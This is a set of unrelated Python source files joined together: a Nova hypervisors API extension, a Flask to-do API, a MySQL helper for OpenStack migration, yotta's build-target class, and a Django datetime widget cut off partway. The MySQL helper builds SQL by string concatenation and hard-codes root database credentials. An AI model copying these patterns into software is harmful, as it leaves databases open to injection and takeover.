root.set('current_workload')
root.set('running_vms')
root.set('disk_available_least')
return xmlutil.MasterTemplate(root, 1)
class HypervisorsController(object):
"""The Hypervisors API controller for the OpenStack API."""
def __init__(self):
self.host_api = compute.HostAPI()
super(HypervisorsController, self).__init__()
def _view_hypervisor(self, hypervisor, detail, servers=None, **kwargs):
hyp_dict = {
'id': hypervisor['id'],
'hypervisor_hostname': hypervisor['hypervisor_hostname'],
}
if detail and not servers:
for field in ('vcpus', 'memory_mb', 'local_gb', 'vcpus_used',
'memory_mb_used', 'local_gb_used',
'hypervisor_type', 'hypervisor_version',
'free_ram_mb', 'free_disk_gb', 'current_workload',
'running_vms', 'cpu_info', 'disk_available_least'):
hyp_dict[field] = hypervisor[field]
hyp_dict['service'] = {
'id': hypervisor['service_id'],
'host': hypervisor['service']['host'],
}
if servers:
hyp_dict['servers'] = [dict(name=serv['name'], uuid=serv['uuid'])
for serv in servers]
# Add any additional info
if kwargs:
hyp_dict.update(kwargs)
return hyp_dict
@wsgi.serializers(xml=HypervisorIndexTemplate)
def index(self, req):
context = req.environ['nova.context']
authorize(context)
compute_nodes = self.host_api.compute_node_get_all(context)
return dict(hypervisors=[self._view_hypervisor(hyp, False)
for hyp in compute_nodes])
@wsgi.serializers(xml=HypervisorDetailTemplate)
def detail(self, req):
context = req.environ['nova.context']
authorize(context)
compute_nodes = self.host_api.compute_node_get_all(context)
return dict(hypervisors=[self._view_hypervisor(hyp, True)
for hyp in compute_nodes])
@wsgi.serializers(xml=HypervisorTemplate)
def show(self, req, id):
context = req.environ['nova.context']
authorize(context)
try:
hyp = self.host_api.compute_node_get(context, id)
except (ValueError, exception.ComputeHostNotFound):
msg = _("Hypervisor with ID '%s' could not be found.") % id
raise webob.exc.HTTPNotFound(explanation=msg)
return dict(hypervisor=self._view_hypervisor(hyp, True))
@wsgi.serializers(xml=HypervisorUptimeTemplate)
def uptime(self, req, id):
context = req.environ['nova.context']
authorize(context)
try:
hyp = self.host_api.compute_node_get(context, id)
except (ValueError, exception.ComputeHostNotFound):
msg = _("Hypervisor with ID '%s' could not be found.") % id
raise webob.exc.HTTPNotFound(explanation=msg)
# Get the uptime
try:
host = hyp['service']['host']
uptime = self.host_api.get_host_uptime(context, host)
except NotImplementedError:
msg = _("Virt driver does not implement uptime function.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
return dict(hypervisor=self._view_hypervisor(hyp, False,
uptime=uptime))
@wsgi.serializers(xml=HypervisorIndexTemplate)
def search(self, req, id):
context = req.environ['nova.context']
authorize(context)
hypervisors = self.host_api.compute_node_search_by_hypervisor(
context, id)
if hypervisors:
return dict(hypervisors=[self._view_hypervisor(hyp, False)
for hyp in hypervisors])
else:
msg = _("No hypervisor matching '%s' could be found.") % id
raise webob.exc.HTTPNotFound(explanation=msg)
@wsgi.serializers(xml=HypervisorServersTemplate)
def servers(self, req, id):
context = req.environ['nova.context']
authorize(context)
compute_nodes = self.host_api.compute_node_search_by_hypervisor(
context, id)
if not compute_nodes:
msg = _("No hypervisor matching '%s' could be found.") % id
raise webob.exc.HTTPNotFound(explanation=msg)
hypervisors = []
for compute_node in compute_nodes:
instances = self.host_api.instance_get_all_by_host(context,
compute_node['service']['host'])
hyp = self._view_hypervisor(compute_node, False, instances)
hypervisors.append(hyp)
return dict(hypervisors=hypervisors)
@wsgi.serializers(xml=HypervisorStatisticsTemplate)
def statistics(self, req):
context = req.environ['nova.context']
authorize(context)
stats = self.host_api.compute_node_statistics(context)
return dict(hypervisor_statistics=stats)
class Hypervisors(extensions.ExtensionDescriptor):
"""Admin-only hypervisor administration."""
name = "Hypervisors"
alias = "os-hypervisors"
namespace = "http://docs.openstack.org/compute/ext/hypervisors/api/v1.1"
updated = "2012-06-21T00:00:00+00:00"
def get_resources(self):
resources = [extensions.ResourceExtension('os-hypervisors',
HypervisorsController(),
collection_actions={'detail': 'GET',
'statistics': 'GET'},
member_actions={'uptime': 'GET',
'search': 'GET',
'servers': 'GET'})]
return resources
| |
# -*- coding: utf-8 -*-
from flask import jsonify, request, abort, url_for
from datetime import datetime
from . import api
from ..models import User, Todo, TodoList
from ..decorators import admin_required
@api.route('/')
def get_routes():
routes = dict()
routes['users'] = url_for('api.get_users', _external=True)
routes['todolists'] = url_for('api.get_todolists', _external=True)
return jsonify(routes)
@api.route('/users/')
def get_users():
users = User.query.all()
return jsonify({
'users': [{'user': user.to_json()} for user in users]
})
@api.route('/user/<username>/')
def get_user(username):
user = User.query.filter_by(username=username).first()
if not user:
abort(404)
return jsonify({'user': user.to_json()})
@api.route('/user/', methods=['POST'])
def add_user():
try:
username = request.json.get('username')
email = request.json.get('email')
password = request.json.get('password')
if User.is_valid_username(username) and User.is_valid_email(email) \
and User.is_valid_password(password):
user = User(
username=username, email=email, password=password
).save()
else:
abort(400)
except:
abort(400)
return jsonify({'user': user.to_json()}), 201
@api.route('/user/<username>/todolists/')
def get_user_todolists(username):
user = User.query.filter_by(username=username).first()
if not user:
abort(404)
todolists = user.todolists
return jsonify({
'todolists': [todolist.to_json() for todolist in todolists]
})
@api.route('/user/<username>/todolist/<int:todolist_id>/')
def get_user_todolist(username, todolist_id):
user = User.query.filter_by(username=username).first()
todolist = TodoList.query.get_or_404(todolist_id)
if not user or username != todolist.creator:
abort(404)
return jsonify({'todolist': todolist.to_json()})
@api.route('/user/<username>/todolist/', methods=['POST'])
def add_user_todolist(username):
try:
user = User.query.filter_by(username=username).one()
todolist = TodoList(
title=request.json.get('title'),
creator=user.username
).save()
except:
abort(400)
return jsonify({'todolist': todolist.to_json()}), 201
@api.route('/todolists/')
def get_todolists():
todolists = TodoList.query.all()
return jsonify({
'todolists': [todolist.to_json() for todolist in todolists]
})
@api.route('/todolist/<int:todolist_id>/')
def get_todolist(todolist_id):
todolist = TodoList.query.get_or_404(todolist_id)
return jsonify({'todolist': todolist.to_json()})
@api.route('/todolist/', methods=['POST'])
def add_todolist():
try:
title = request.json.get('title')
if title and TodoList.is_valid_title(title):
todolist = TodoList(title=title).save()
else:
abort(400)
except:
abort(400)
return jsonify({'todolist': todolist.to_json()}), 201
@api.route('/todolist/<int:todolist_id>/todos/')
def get_todolist_todos(todolist_id):
todolist = TodoList.query.get_or_404(todolist_id)
return jsonify({
'todos': [todo.to_json() for todo in todolist.todos]
})
@api.route('/user/<username>/todolist/<int:todolist_id>/todos/')
def get_user_todolist_todos(username, todolist_id):
todolist = TodoList.query.get_or_404(todolist_id)
if todolist.creator != username:
abort(404)
return jsonify({
'todos': [todo.to_json() for todo in todolist.todos]
})
@api.route('/user/<username>/todolist/<int:todolist_id>/', methods=['POST'])
def add_user_todolist_todo(username, todolist_id):
try:
user = User.query.filter_by(username=username).one()
# this way we check the existence of the todolist
todolist = TodoList.query.get(todolist_id)
todo = Todo(
description=request.json.get('description'),
todolist_id=todolist.id,
creator=username
).save()
except:
abort(400)
return jsonify({'todo': todo.to_json()}), 201
@api.route('/todolist/<int:todolist_id>/', methods=['POST'])
def add_todolist_todo(todolist_id):
try:
todolist = TodoList.query.get(todolist_id)
todo = Todo(
description=request.json.get('description'),
todolist_id=todolist.id
).save()
except:
abort(400)
return jsonify({'todo': todo.to_json()}), 201
@api.route('/todo/<int:todo_id>/')
def get_todo(todo_id):
todo = Todo.query.get_or_404(todo_id)
return jsonify({'todo': todo.to_json()})
@api.route('/todo/<int:todo_id>/', methods=['PUT'])
def update_todo_status(todo_id):
try:
todo = Todo.query.get(todo_id)
todo_json = request.json.get('todo')
todo.is_finished = todo_json.get('is_finished')
if todo.is_finished:
todo.finished_at = datetime.strptime(
todo_json.get('finished_at'), '%Y-%m-%dT%H:%M:%S.%fZ'
)
else:
todo.finished_at = None
todo.save()
except:
abort(400)
return jsonify({'todo': todo.to_json()})
@api.route('/todolist/<int:todolist_id>/', methods=['PUT'])
def change_todolist_title(todolist_id):
try:
todolist = TodoList.query.get(todolist_id)
todolist_json = request.json.get('todolist')
title = todolist_json.get('title')
if TodoList.is_valid_title(title):
todolist.change_title(title)
else:
abort(400)
except:
abort(400)
return jsonify({'todolist': todolist.to_json()})
@api.route('/user/<int:user_id>/', methods=['DELETE'])
@admin_required
def delete_user(user_id):
try:
user = User.query.get(user_id)
if user_id == request.json.get('user_id'):
user.delete()
return jsonify()
else:
abort(400)
except:
abort(400)
@api.route('/todolist/<int:todolist_id>/', methods=['DELETE'])
@admin_required
def delete_todolist(todolist_id):
try:
todolist = TodoList.query.get(todolist_id)
if todolist_id == request.json.get('todolist_id'):
todolist.delete()
return jsonify()
else:
abort(400)
except:
abort(400)
@api.route('/todo/<int:todo_id>/', methods=['DELETE'])
@admin_required
def delete_todo(todo_id):
try:
todo = Todo.query.get(todo_id)
if todo_id == request.json.get('todo_id'):
todo.delete()
return jsonify()
else:
abort(400)
except:
abort(400)
| |
import threading
from oslo.config import cfg
__author__ = 'hydezhang'
import MySQLdb
import base64
from DBUtils.PooledDB import PooledDB
import logging
LOG = logging.getLogger(__name__)
db_pool = None
def create_db_pool(db_name=None):
credentials = get_db_credentials()
db_name = str(cfg.CONF.DATABASE.db_name) if db_name is None else db_name
credentials.update({'db': db_name})
global db_pool
mutex = threading.Lock()
mutex.acquire()
if db_pool is None:
db_pool = PooledDB(MySQLdb, 100, **credentials)
mutex.release()
def release_db_pool():
global db_pool
mutex = threading.Lock()
mutex.acquire()
if db_pool is not None:
db_pool.close()
db_pool = None
mutex.release()
def get_db_credentials():
password = cfg.CONF.DATABASE.mysql_password
password = base64.b64decode(password)
credentials = {'host': str(cfg.CONF.DATABASE.host),
'user': str(cfg.CONF.DATABASE.user),
'passwd': str(password)}
return credentials
def connect(with_db, db_name=None):
# preparing database credentials
"""
:param with_db: flag to indicate whether to connect to
a particular database or not
"""
if with_db:
db = db_pool.connection()
else:
credentials = get_db_credentials()
db = MySQLdb.connect(**credentials)
return db
def connect_openstack_db(host, db_name):
credentials = {'host': host,
'user': 'root',
'passwd': 'password',
'db': db_name}
db = MySQLdb.connect(**credentials)
return db
def read_openstack_record(host, db_name, table_name, columns, where_dict,
close):
# establish connection
db = connect_openstack_db(host, db_name)
cursor = get_cursor(db)
filter_str = build_where_string(where_dict)
# build columns list
columns_str = ', '.join(columns)
if len(where_dict.keys()) > 0:
query = "SELECT {0} FROM {1} WHERE {2}".format(columns_str,
table_name,
filter_str)
else:
query = "SELECT {0} FROM {1} ".format(columns_str, table_name)
data = None
try:
cursor.execute(query)
data = cursor.fetchall()
except MySQLdb.Error, e:
LOG.error("MySQL error: {}".format(e))
db.rollback()
if close:
db.close()
return data
def update_openstack_record(host, db_name, table_name, set_dict, where_dict,
close):
db = connect_openstack_db(host, db_name)
cursor = get_cursor(db)
# building "SET" string
set_str = ''
for key in set_dict.keys():
if key != set_dict.keys()[0]:
set_str += ', '
set_str += str(key) + " = '" + str(set_dict[key]) + "'"
filter_str = build_where_string(where_dict)
query = "UPDATE {0} SET {1} WHERE {2}" \
.format(table_name, set_str, filter_str)
try:
cursor.execute(query)
db.commit()
except MySQLdb.Error, e:
LOG.error("MySql error: {}".format(e))
db.rollback()
if close:
db.close()
def insert_openstack_record(host, db_name, table_name, values, close):
# establish connection
db = connect_openstack_db(host, db_name)
cursor = get_cursor(db)
for item in values:
# preparing sql statement
columns = item.keys()
columns_str = columns[0]
values_str = add_quotes(item[columns[0]])
for i in xrange(1, len(columns)):
columns_str += ', ' + columns[i]
values_str += ', ' + add_quotes(item[columns[i]])
query = "INSERT INTO {0} ({1}) VALUES ({2})"\
.format(table_name, columns_str, values_str)
try:
cursor.execute(query)
db.commit()
except MySQLdb.Error, e:
LOG.error("MySql error - INSERT: {}".format(e))
db.rollback()
if close:
db.close()
def delete_openstack_record(host, db_name, table_name, where_dict, close):
# establish connection
db = connect_openstack_db(host, db_name)
cursor = get_cursor(db)
where_string = build_where_string(where_dict)
query = "DELETE FROM {0} WHERE {1}".format(table_name, where_string)
try:
cursor.execute(query)
db.commit()
except MySQLdb.Error, e:
LOG.error("MySQL error - DELETE SOME: {}".format(e))
db.rollback()
if close:
db.close()
def get_cursor(db):
return db.cursor()
def check_db_exist(db_name):
db = connect(False)
cursor = get_cursor(db)
table_name = add_quotes(db_name)
query_check = "SHOW DATABASES LIKE {}".format(table_name)
result = cursor.execute(query_check)
return True if result else False
def delete_database(db_name):
db = connect(False)
cursor = get_cursor(db)
result = check_db_exist(db_name)
if not result:
LOG.info("Database {} does not exist".format(db_name))
cursor.close()
db.close()
return
query_delete = 'DROP DATABASE {} '.format(db_name)
try:
cursor.execute(query_delete)
db.commit()
db.close()
except MySQLdb.Error, e:
print("MySQL error - Database deleting: {}".format(e))
db.rollback()
def create_database(db_name):
db = connect(False)
cursor = get_cursor(db)
result = check_db_exist(db_name)
if result:
LOG.info("Database {} already exists".format(db_name))
cursor.close()
db.close()
return
query_create = 'CREATE DATABASE IF NOT EXISTS {} '.format(db_name)
try:
cursor.execute(query_create)
db.commit()
db.close()
except MySQLdb.Error, e:
print("MySQL error - Database creation: {}".format(e))
db.rollback()
def delete_table(table_name):
if not check_table_exist(table_name):
return
db = connect(True)
cursor = get_cursor(db)
query = "DROP TABLE {0} ".format(table_name)
try:
cursor.execute(query)
db.commit()
except MySQLdb.Error, e:
LOG.error("MySql error - Table creation: {}".format(e))
db.rollback()
finally:
db.close()
def create_table(table_name, columns, close):
"""
function to create database table
:param table_name: name of the table to be created
:param columns: columns of the table
:param close: flag to indicate whether to close db connection
"""
# establish connection
db = connect(True)
cursor = get_cursor(db)
query = "CREATE TABLE IF NOT EXISTS {0} ({1}) ".format(table_name, columns)
try:
cursor.execute(query)
db.commit()
except MySQLdb.Error, e:
LOG.error("MySql error - Table creation: {}".format(e))
db.rollback()
if close:
db.close()
def insert_record(table_name, values, close):
"""
function to do table insert
:param table_name: name of the table to be effected
:param values: list of dictionaries of column and value pair
:param close: flag to indicate whether to close db connection
"""
# establish connection
db = connect(True)
cursor = get_cursor(db)
for item in values:
# preparing sql statement
columns = item.keys()
columns_str = columns[0]
values_str = add_quotes(item[columns[0]])
for i in xrange(1, len(columns)):
columns_str += ', ' + columns[i]
values_str += ', ' + add_quotes(item[columns[i]])
query = "INSERT INTO {0} ({1}) VALUES ({2})"\
.format(table_name, columns_str, values_str)
try:
cursor.execute(query)
db.commit()
except MySQLdb.Error, e:
LOG.error("MySql error - INSERT: {}".format(e))
db.rollback()
if close:
db.close()
def update_table(table_name, set_dict, where_dict, close):
# establish connection
"""function to do update record in table
:param table_name: name of the table to be effected
:param set_dict: set dictionary
:param where_dict: where dictionary
:param close: flag to indicate whether to close db connection
"""
db = connect(True)
cursor = get_cursor(db)
# building "SET" string
first_key = set_dict.keys()[0]
first_value = set_dict[first_key]
set_str = str(first_key) + " = " + add_quotes(first_value)
for key in set_dict.keys():
set_str += ', ' + str(key) + " = " + add_quotes(str(set_dict[key]))
filter_str = build_where_string(where_dict)
query = "UPDATE {0} SET {1} WHERE {2}" \
.format(table_name, set_str, filter_str)
try:
cursor.execute(query)
db.commit()
except MySQLdb.Error, e:
LOG.error("MySql error - UPDATE: {}".format(e))
db.rollback()
if close:
db.close()
def build_where_string(where_dict):
# build "WHERE" string
filter_str = ''
for key in where_dict.keys():
if key != where_dict.keys()[0]:
filter_str += ' AND '
filter_str += str(key) + " = '" + str(where_dict[key]) + "'"
return filter_str
def read_record(table_name, columns, where_dict, close):
"""
function that implements SELECT statement
:param table_name: name of the table to read data from
:param close: flag to indicate whether to close db connection
:param columns: columns from which the data is selected
:param where_dict: where dictionary
"""
# establish connection
db = connect(True)
cursor = get_cursor(db)
filter_str = build_where_string(where_dict) if where_dict else None
# build columns list
columns_str = ', '.join(columns)
if filter_str:
query = "SELECT {0} FROM {1} WHERE {2}".format(columns_str, table_name,
filter_str)
else:
query = "SELECT {0} FROM {1} ".format(columns_str, table_name)
data = None
try:
cursor.execute(query)
data = cursor.fetchall()
except MySQLdb.Error, e:
LOG.error("MySQL error - SELECT: {}".format(e))
db.rollback()
if data and len(data) == 0:
print("no migration record found for {0} where {1}"
.format(table_name, filter_str))
if close:
db.close()
return data
def delete_all_data(table_name):
"""
function that delete all data from a table
"""
# establish connection
db = connect(True)
cursor = get_cursor(db)
query = "DELETE FROM {0}".format(table_name)
try:
cursor.execute(query)
db.commit()
except MySQLdb.Error, e:
LOG.error("MySQL error - DELETE ALL: {}".format(e))
db.rollback()
db.close()
def delete_record(table_name, where_dict):
"""
function that delete all data from a table
"""
# establish connection
db = connect(True)
cursor = get_cursor(db)
if where_dict and len(where_dict.keys()) > 0:
where_string = build_where_string(where_dict)
query = "DELETE FROM {0} WHERE {1}".format(table_name, where_string)
else:
query = "DELETE FROM {}".format(table_name)
try:
cursor.execute(query)
db.commit()
except MySQLdb.Error, e:
LOG.error("MySQL error - DELETE SOME: {}".format(e))
db.rollback()
db.close()
def check_table_exist(table_name):
"""
function that checks whether a table exists
"""
db = connect(True)
cursor = get_cursor(db)
table_name = "'" + table_name + "'"
query = "SHOW TABLES LIKE {}".format(table_name)
result = cursor.execute(query)
db.close()
if result:
return True
return False
def check_record_exist(table_name, where_dict):
db = connect(True)
cursor = get_cursor(db)
filter_str = build_where_string(where_dict)
query = "SELECT * FROM {0} WHERE {1}".format(table_name, filter_str)
result = cursor.execute(query)
db.close()
return True if result else False
def add_quotes(string):
return "'" + str(string) + "'"
| |
# Copyright 2014 ARM Limited
#
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
# standard library modules, , ,
import json
import os
import signal
import subprocess
import logging
import string
import traceback
import errno
# version, , represent versions and specifications, internal
import version
# Pack, , common parts of Components/Targets, internal
import pack
Target_Description_File = 'target.json'
Registry_Namespace = 'targets'
def _ignoreSignal(signum, frame):
logging.debug('ignoring signal %s, traceback:\n%s' % (
signum, ''.join(traceback.format_list(traceback.extract_stack(frame)))
))
def _newPGroup():
os.setpgrp()
# API
class Target(pack.Pack):
def __init__(self, path, installed_linked=False, latest_suitable_version=None):
''' Initialise a Target based on a directory. If the directory does not
contain a valid target.json file the initialised object will test
false, and will contain an error property containing the failure.
'''
# !!! TODO: implement a target.json schema, and pass schema_filename
# here:
super(Target, self).__init__(
path,
description_filename = Target_Description_File,
installed_linked = installed_linked,
latest_suitable_version = latest_suitable_version
)
def dependencyResolutionOrder(self):
''' Return a sequence of names that should be used when resolving
dependencies: if specific dependencies exist for
'''
return [self.description['name']] + self.description['similarTo']
def getToolchainFile(self):
return os.path.join(self.path, self.description['toolchain'])
#def getLinkScriptFile(self):
# return os.path.join(self.path, self.description['linkscript'])
def getRegistryNamespace(self):
return Registry_Namespace
@classmethod
def addBuildOptions(cls, parser):
parser.add_argument('-G', '--cmake-generator', dest='cmake_generator',
default=('Unix Makefiles', 'Ninja')[os.name == 'nt'],
choices=(
'Unix Makefiles',
'Ninja',
'Xcode',
'Sublime Text 2 - Ninja',
'Sublime Text 2 - Unix Makefiles'
)
)
@classmethod
def overrideBuildCommand(cls, generator_name):
# when we build using cmake --build, the nice colourised output is lost
# - so override with the actual build command for command-line
# generators where people will care:
try:
return {
'Unix Makefiles': ['make'],
'Ninja': ['ninja']
}[generator_name]
except KeyError:
return None
def hintForCMakeGenerator(self, generator_name, component):
try:
name = self.getName()
component_name = component.getName()
return {
'Xcode':
'to open the built project, run:\nopen ./build/%s/%s.xcodeproj' % (name, component_name),
'Sublime Text 2 - Ninja':
'to open the built project, run:\nopen ./build/%s/%s.??' % (name, component_name),
'Sublime Text 2 - Unix Makefiles':
'to open the built project, run:\nopen ./build/%s/%s.??' % (name, component_name)
}[generator_name]
except KeyError:
return None
def exec_helper(self, cmd, builddir):
''' Execute the given command, returning an error message if an error occured
or None if the command was succesful.'''
try:
child = subprocess.Popen(cmd, cwd=builddir)
child.wait()
except OSError as e:
if e.errno == errno.ENOENT:
if cmd[0] == 'cmake':
return 'CMake is not installed, please follow the installation instructions at http://docs.yottabuild.org/#installing'
else:
return '%s is not installed' % (cmd[0])
else:
return 'command %s failed' % (cmd)
if child.returncode:
return 'command %s failed' % (cmd)
def build(self, builddir, component, args, release_build=False, build_args=None):
''' Execute the commands necessary to build this component, and all of
its dependencies. '''
if build_args is None:
build_args = []
# in the future this may be specified in the target description, but
# for now we only support cmake, so everything is simple:
build_type = ('Debug', 'RelWithDebInfo')[release_build]
if build_type:
cmd = ['cmake', '-D', 'CMAKE_BUILD_TYPE=%s' % build_type, '-G', args.cmake_generator, '.']
else:
cmd = ['cmake', '-G', args.cmake_generator, '.']
res = self.exec_helper(cmd, builddir)
if res is not None:
yield res
# cmake error: the generated Ninja build file will not work on windows when arguments are read from
# a file (@file) instead of the command line, since '\' in @file is interpreted as an escape sequence.
# !!! FIXME: remove this once http://www.cmake.org/Bug/view.php?id=15278 is fixed!
if args.cmake_generator == "Ninja" and os.name == 'nt':
logging.debug("Converting back-slashes in build.ninja to forward-slashes")
build_file = os.path.join(builddir, "build.ninja")
# We want to convert back-slashes to forward-slashes, except in macro definitions, such as
# -DYOTTA_COMPONENT_VERSION = \"0.0.1\". So we use a little trick: first we change all \"
# strings to an unprintable ASCII char that can't appear in build.ninja (in this case \1),
# then we convert all the back-slashed to forward-slashes, then we convert '\1' back to \".
try:
f = open(build_file, "r+t")
data = f.read()
data = data.replace('\\"', '\1')
data = data.replace('\\', '/')
data = data.replace('\1', '\\"')
f.seek(0)
f.write(data)
f.close()
except:
yield 'Unable to update "%s", aborting' % build_file
build_command = self.overrideBuildCommand(args.cmake_generator)
if build_command:
cmd = build_command + build_args
else:
cmd = ['cmake', '--build', builddir] + build_args
res = self.exec_helper(cmd, builddir)
if res is not None:
yield res
hint = self.hintForCMakeGenerator(args.cmake_generator, component)
if hint:
logging.info(hint)
def debug(self, builddir, program):
''' Launch a debugger for the specified program. '''
if 'debug' not in self.description:
yield "Target %s does not specify debug commands" % self
return
prog_path = os.path.join(builddir, program)
if not os.path.isfile(prog_path):
suggestion = None
if (prog_path.endswith('.c') or prog_path.endswith('.m')) and os.path.isfile(prog_path[:-2]):
suggestion = program[:-2]
elif (prog_path.endswith('.cpp') or prog_path.endswith('.cxx')) and os.path.isfile(prog_path[:-4]):
suggestion = program[:-4]
elif os.path.isfile(os.path.join(builddir, 'source', program)):
suggestion = os.path.join('source', program)
if suggestion is not None:
yield "%s does not exist, perhaps you meant %s" % (program, suggestion)
else:
yield "%s does not exist" % program
return
with open(os.devnull, "w") as dev_null:
daemon = None
child = None
try:
# debug-server is the old name, debugServer is the new name
debug_server_prop = 'debugServer'
if not debug_server_prop in self.description:
debug_server_prop = 'debug-server'
if debug_server_prop in self.description:
logging.debug('starting debug server...')
daemon = subprocess.Popen(
self.description[debug_server_prop],
cwd = builddir,
stdout = dev_null,
stderr = dev_null,
preexec_fn = _newPGroup
)
else:
daemon = None
signal.signal(signal.SIGINT, _ignoreSignal);
cmd = [
os.path.expandvars(string.Template(x).safe_substitute(program=prog_path))
for x in self.description['debug']
]
logging.debug('starting debugger: %s', cmd)
child = subprocess.Popen(
cmd, cwd = builddir
)
child.wait()
if child.returncode:
yield "debug process executed with status %s" % child.returncode
child = None
except:
# reset the terminal, in case the debugger has screwed it up
os.system('reset')
raise
finally:
if child is not None:
child.terminate()
if daemon is not None:
logging.debug('shutting down debug server...')
daemon.terminate()
# clear the sigint handler
signal.signal(signal.SIGINT, signal.SIG_DFL);
| |
__author__ = 'Alfredo Saglimbeni'
from datetime import datetime
import re
import uuid
from django.forms import forms, widgets
from django.forms.widgets import MultiWidget, DateTimeInput, DateInput, TimeInput
from django.utils.formats import get_format, get_language
from django.utils.safestring import mark_safe
from django.utils.six import string_types
try:
from django.forms.widgets import to_current_timezone
except ImportError:
to_current_timezone = lambda obj: obj # passthrough, no tz support
# This should be updated as more .po files are added to the datetime picker javascript code
supported_languages = set([
'ar',
'bg',
'ca', 'cs',
'da', 'de',
'ee', 'el', 'es',
'fi', 'fr',
'he', 'hr', 'hu',
'id', 'is', 'it',
'ja',
'ko', 'kr',
'lt', 'lv',
'ms',
'nb', 'nl', 'no',
'pl', 'pt-BR', 'pt',
'ro', 'rs', 'rs-latin', 'ru',
'sk', 'sl', 'sv', 'sw',
'th', 'tr',
'ua', 'uk',
'zh-CN', 'zh-TW',
])
def get_supported_language(language_country_code):
"""Helps us get from django's 'language-countryCode' to the datepicker's 'language' if we
possibly can.
If we pass the django 'language_countryCode' through untouched then it might not
match an exact language string supported by the datepicker and would default to English which
would be worse than trying to match the language part.
"""
# Catch empty strings in case one sneeks in
if not language_country_code:
return 'en'
# Check full language & country code against the supported languages as there are dual entries
# in the list eg. zh-CN (assuming that is a language country code)
if language_country_code in supported_languages:
return language_country_code
# Grab just the language part and try that
language = language_country_code.split('-')[0]
if language in supported_languages:
return language
# Otherwise return English as the default
return 'en'
dateConversiontoPython = {
'P': '%p',
'ss': '%S',
'ii': '%M',
'hh': '%H',
'HH': '%I',
'dd': '%d',
'mm': '%m',
'yy': '%y',
'yyyy': '%Y',
}
toPython_re = re.compile(r'\b(' + '|'.join(dateConversiontoPython.keys()) + r')\b')
dateConversiontoJavascript = {
'%M': 'ii',
'%m': 'mm',
'%I': 'HH',
'%H': 'hh',
'%d': 'dd',
'%Y': 'yyyy',
'%y': 'yy',
'%p': 'P',
'%S': 'ss'
}
toJavascript_re = re.compile(r'(?<!\w)(' + '|'.join(dateConversiontoJavascript.keys()) + r')\b')
BOOTSTRAP_INPUT_TEMPLATE = {
2: """
<div id="%(id)s" class="controls input-append date">
%(rendered_widget)s
%(clear_button)s
<span class="add-on"><i class="icon-th"></i></span>
</div>
<script type="text/javascript">
$("#%(id)s").datetimepicker({%(options)s});
</script>
""",
3: """
<div id="%(id)s" class="input-group date">
%(rendered_widget)s
%(clear_button)s
<span class="input-group-addon"><span class="glyphicon %(glyphicon)s"></span></span>
</div>
<script type="text/javascript">
$("#%(id)s").datetimepicker({%(options)s}).find('input').addClass("form-control");
</script>
"""
}
CLEAR_BTN_TEMPLATE = {2: """<span class="add-on"><i class="icon-remove"></i></span>""",
3: """<span class="input-group-addon"><span class="glyphicon glyphicon-remove"></span></span>"""}
quoted_options = set([
'format',
'startDate',
'endDate',
'startView',
'minView',
'maxView',
'todayBtn',
'language',
'pickerPosition',
'viewSelect',
'initialDate',
'weekStart',
'minuteStep'
'daysOfWeekDisabled',
])
# to traslate boolean object to javascript
quoted_bool_options = set([
'autoclose',
'todayHighlight',
'showMeridian',
'clearBtn',
])
def quote(key, value):
"""Certain options support string values. We want clients to be able to pass Python strings in
but we need them to be quoted in the output. Unfortunately some of those options also allow
numbers so we type check the value before wrapping it in quotes.
"""
if key in quoted_options and isinstance(value, string_types):
return "'%s'" % value
if key in quoted_bool_options and isinstance(value, bool):
return {True:'true',False:'false'}[value]
return value
class PickerWidgetMixin(object):
format_name = None
glyphicon = None
def __init__(self, attrs=None, options=None, usel10n=None, bootstrap_version=None):
if bootstrap_version in [2,3]:
self.bootstrap_version = bootstrap_version
else:
# default 2 to mantain support to old implemetation of django-datetime-widget
self.bootstrap_version = 2
if attrs is None:
attrs = {'readonly': ''}
self.options = options
self.is_localized = False
self.format = None
# We want to have a Javascript style date format specifier in the options dictionary and we
# want a Python style date format specifier as a member variable for parsing the date string
# from the form data
if usel10n is True:
# If we're doing localisation, get the local Python date format and convert it to
# Javascript data format for the options dictionary
self.is_localized = True
# Get format from django format system
self.format = get_format(self.format_name)[0]
# Convert Python format specifier to Javascript format specifier
self.options['format'] = toJavascript_re.sub(
lambda x: dateConversiontoJavascript[x.group()],
self.format
)
# Set the local language
self.options['language'] = get_supported_language(get_language())
else:
# If we're not doing localisation, get the Javascript date format provided by the user,
# with a default, and convert it to a Python data format for later string parsing
format = self.options['format']
self.format = toPython_re.sub(
lambda x: dateConversiontoPython[x.group()],
format
)
super(PickerWidgetMixin, self).__init__(attrs, format=self.format)
def render(self, name, value, attrs=None):
final_attrs = self.build_attrs(attrs)
rendered_widget = super(PickerWidgetMixin, self).render(name, value, final_attrs)
#if not set, autoclose have to be true.
self.options.setdefault('autoclose', True)
# Build javascript options out of python dictionary
options_list = []
for key, value in iter(self.options.items()):
options_list.append("%s: %s" % (key, quote(key, value)))
js_options = ",\n".join(options_list)
# Use provided id or generate hex to avoid collisions in document
id = final_attrs.get('id', uuid.uuid4().hex)
clearBtn = quote('clearBtn', self.options.get('clearBtn', 'true')) == 'true'
return mark_safe(
BOOTSTRAP_INPUT_TEMPLATE[self.bootstrap_version]
% dict(
id=id,
rendered_widget=rendered_widget,
clear_button=CLEAR_BTN_TEMPLATE[self.bootstrap_version] if clearBtn else "",
glyphicon=self.glyphicon,
options=js_options
)
)
def _media(self):
js = ["js/bootstrap-datetimepicker.js"]
language = self.options.get('language', 'en')
if language != 'en':
js.append("js/locales/bootstrap-datetimepicker.%s.js" % language)
return widgets.Media(
css={
'all': ('css/datetimepicker.css',)
},
js=js
)
media = property(_media)
class DateTimeWidget(PickerWidgetMixin, DateTimeInput):
"""
DateTimeWidget is the corresponding widget for Datetime field, it renders both the date and time
sections of the datetime picker.
"""
format_name = 'DATETIME_INPUT_FORMATS'
glyphicon = 'glyphicon-th'
def __init__(self, attrs=None, options=None, usel10n=None, bootstrap_version=None):
if options is None:
options = {}
# Set the default options to show only the datepicker object
options['format'] = options.get('format', 'dd/mm/yyyy hh:ii')
super(DateTimeWidget, self).__init__(attrs, options, usel10n, bootstrap_version)
class DateWidget(PickerWidgetMixin, DateInput):
"""
DateWidget is the corresponding widget for Date field, it renders only the date section of
datetime picker.
"""
format_name = 'DATE_INPUT_FORMATS'
glyphicon = 'glyphicon-calendar'
def __init__(self, attrs=None, options=None, usel10n=None, bootstrap_version=None):
if options is None:
options = {}
# Set the default options to show only the datepicker object
options['startView'] = options.get('startView', 2)
options['minView'] = options.get('minView', 2)
